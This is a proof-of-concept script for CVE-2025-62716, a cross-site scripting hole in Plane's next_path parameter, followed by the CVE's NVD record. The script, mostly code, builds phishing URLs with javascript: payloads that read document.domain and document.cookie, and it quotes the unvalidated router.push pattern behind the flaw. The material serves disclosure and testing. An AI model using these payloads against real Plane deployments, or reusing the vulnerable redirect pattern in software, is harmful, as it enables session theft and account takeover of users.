CVE-2025-62716

// CVE-2025-62716 PoC - Plane XSS via next_path parameter // This PoC demonstrates the XSS vulnerability in Plane's next_path parameter const http = require('http'); const url = require('url'); // Malicious URL that exploits the XSS vulnerability const maliciousUrl = 'http://target-plane.com/auth?next_path=javascript:alert(document.domain)'; // Attack scenario: // 1. Attacker creates a phishing email or webpage with the malicious URL // 2. Victim clicks on the link // 3. Plane processes next_path parameter without validation // 4. The javascript: protocol handler executes arbitrary JS code console.log('[*] CVE-2025-62716 PoC'); console.log('[*] Target: Plane < 1.1.0'); console.log('[*] Malicious URL:', maliciousUrl); // Generate phishing link with URL encoding const encodedNextPath = encodeURIComponent('javascript:alert(document.cookie)'); const exploitUrl = `http://target-plane.com/auth?next_path=${encodedNextPath}`; console.log('[*] Encoded exploit URL:', exploitUrl); // Simulated attack request const parsedUrl = url.parse(exploitUrl, true); console.log('[*] Extracted next_path value:', parsedUrl.query.next_path); // This value is passed directly to router.push without validation // Vulnerable code pattern: // const nextPath = new URLSearchParams(window.location.search).get('next_path'); // router.push(nextPath); // No validation - XSS occurs here

{"cve": {"id": "CVE-2025-62716", "sourceIdentifier": "[email protected]", "published": "2025-10-24T20:17:38.980", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Plane is open-source project management software. Prior to version 1.1.0, an open redirect vulnerability in the ?next_path query parameter allows attackers to supply arbitrary schemes (e.g., javascript:) that are passed directly to router.push. This results in a cross-site scripting (XSS) vulnerability, enabling attackers to execute arbitrary JavaScript in the victim’s browser. The issue can be exploited without authentication and has severe impact, including information disclosure, and privilege escalation and modifications of administrative settings. This issue has been patched in version 1.1.0."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N", "baseScore": 8.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 5.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}, {"lang": "en", "value": "CWE-601"}]}], "references": [{"url": "https://github.com/makeplane/plane/security/advisories/GHSA-6fj7-xgpg-mj6f", "source": "[email protected]"}]}}